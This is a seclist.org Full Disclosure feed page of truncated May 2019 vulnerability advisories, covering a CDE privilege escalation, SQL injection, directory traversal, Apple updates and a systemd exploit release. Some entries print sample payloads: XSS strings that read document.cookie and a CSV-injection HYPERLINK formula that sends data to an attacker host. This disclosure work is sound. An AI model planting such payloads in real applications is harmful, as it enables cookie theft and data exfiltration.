seclist.org

Subscribe to the seclist.org feed
A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.
Updated: 2 hours 6 minutes
17 May 2019

local privilege escalation via CDE dtprintinfo

Posted by Marco Ivaldi on May 17

Dear Full Disclosure,

Please find attached an advisory for the following vulnerability:

A buffer overflow in the DtPrinterAction::PrintActionExists() function in the
Common Desktop Environment 2.3.0 and earlier, as used in Oracle Solaris 10 1/13
(Update 11) and earlier, allows local users to gain root privileges via a long
printer name passed to dtprintinfo by a malicious lpstat program.

Note that Oracle Solaris CDE is based on the original...
17 May 2019

[CVE-2019-11880] CommSy <= 8.6.5 - SQL injection

Posted by Jens Regel | Schneider & Wulf on May 17

Title:
======
CommSy <= 8.6.5 - SQL injection

Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2019-11880

Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
==================...
17 May 2019

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability

Posted by gionreale on May 17

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability

It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system
information via a crafted request:

PoC:
---------------------------------------------------------------------------------------------------------------------------------------

POST /ws/gatshipWs.asmx/SqlVersion <...
17 May 2019

[RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

Posted by RedTeam Pentesting GmbH on May 17

Advisory: Directory Traversal in Cisco Expressway Gateway

RedTeam Pentesting discovered a directory traversal vulnerability in
Cisco Expressway which enables access to administrative web interfaces.

Details
=======

Product: Cisco Expressway Gateway
Affected Versions: 11.5.1, possibly others
Fixed Versions: See Cisco Bug ID CSCvo47769 [1]
Vulnerability Type: Directory Traversal
Security Risk: medium
Vendor URL:...
15 May 2019

SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)

Posted by SEC Consult Vulnerability Lab on May 15

SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
=======================================================================
title: Authorization Bypass
product: RSA NetWitness
vulnerable version: <10.6.6.1, <11.2.1.1
fixed version: 10.6.6.1, 11.2.1.1
CVE number: CVE-2019-3724
impact: Medium
homepage: https://www.rsa.com
found: 2018-09-18...
14 May 2019

[CVE-2018-7841] Schneider Electric U.Motion Builder <= 1.3.4 track_import_export.php object_id Unauthenticated Command Injection

Posted by RCE Security on May 14

RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product: Schneider Electric U.Motion Builder
Vendor URL: www.schneider-electric.com
Type: OS Command Injection [CWE-78]
Date found: 2018-11-15
Date published: 2019-05-13
CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE: CVE-2018-7841

2. CREDITS
==========
This vulnerability was discovered...
13 May 2019

Re: System Down: A systemd-journald exploit

Posted by Qualys Security Advisory on May 13

Hi all,

Our systemd-journald exploit for CVE-2018-16865 and CVE-2018-16866 is
now available at:

https://www.qualys.com/2019/05/09/system-down/system-down.tar.gz

It is also attached to this email. A few notes about this exploit:

- It supports several targets by default (vulnerable versions of Debian,
Ubuntu, Fedora, CentOS), and it should be relatively easy to add more
targets.

- When adding a new amd64 target, use the...
13 May 2019

APPLE-SA-2019-5-13-5 Safari 12.1.1

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-5 Safari 12.1.1

Safari 12.1.1 is now available and addresses the following:

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
included in macOS Mojave 10.14.5
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team...
13 May 2019

APPLE-SA-2019-5-13-6 Apple TV Software 7.3

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-6 Apple TV Software 7.3

Apple TV Software 7.3 is now available and addresses the following:

Bluetooth
Available for: Apple TV (3rd generation)
Impact: A remote attacker may cause an unexpected application
termination or arbitrary code execution
Description: An input validation issue existed in Bluetooth. This
issue was addressed with improved input validation.
CVE-2017-14315: Ben Seri and Gregory Vishnepolsky of Armis

Wi-Fi...
13 May 2019

APPLE-SA-2019-5-13-4 watchOS 5.2.1

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-4 watchOS 5.2.1

watchOS 5.2.1 is now available and addresses the following:

AppleFileConduit
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

CoreAudio
Available for: Apple Watch Series 1 and later
Impact: Processing a...
13 May 2019

APPLE-SA-2019-5-13-3 tvOS 12.3

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-3 tvOS 12.3

tvOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

CoreAudio
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously...
13 May 2019

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update
2019-003 High Sierra, Security Update 2019-003 Sierra

macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, and
Security Update 2019-003 Sierra are now available and
address the following:

Accessibility Framework
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.4
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with...
13 May 2019

APPLE-SA-2019-5-13-1 iOS 12.3

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-1 iOS 12.3

iOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

Contacts
Available for: iPhone 5s and later, iPad...
13 May 2019

[CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity Services

Posted by Joshua Mulliken on May 13

===================
Title: [CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity
Services
Author: Joshua Mulliken <joshua () mulliken net

Thanks to: Carnegie Mellon University CERT Coordination Center
Date Found: Dec. 17, 2018
Vendor: Ellucian Company L.P.
Vendor Homepage:
https://www.ellucian.com
Products: Banner Web Tailor and Banner Enterprise Identity Services
Web Tailor Affected...
13 May 2019

TOR browser / Firefox telemetry data

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that show up in tcpdump
when you are not using Firefox but it connects automatically (if you
block something, Firefox hops to something else, 3-5+ times)

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...
13 May 2019

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...
10 May 2019

Cross Site Scripting | WolfCMS v0.8.3.1 and before

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.
10 May 2019

CSV Injection | Alkacon OpenCMS v10.5.4 and before

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in the New
User module for the parameters First Name and Last Name.

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe&quot;)'

Further details are available here:
https://github.com/alkacon/opencms-core/issues/636

Already requested for...
10 May 2019

Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in the New User module for the parameters First Name and Last Name.

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details are available here:
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...
10 May 2019

Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply login to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...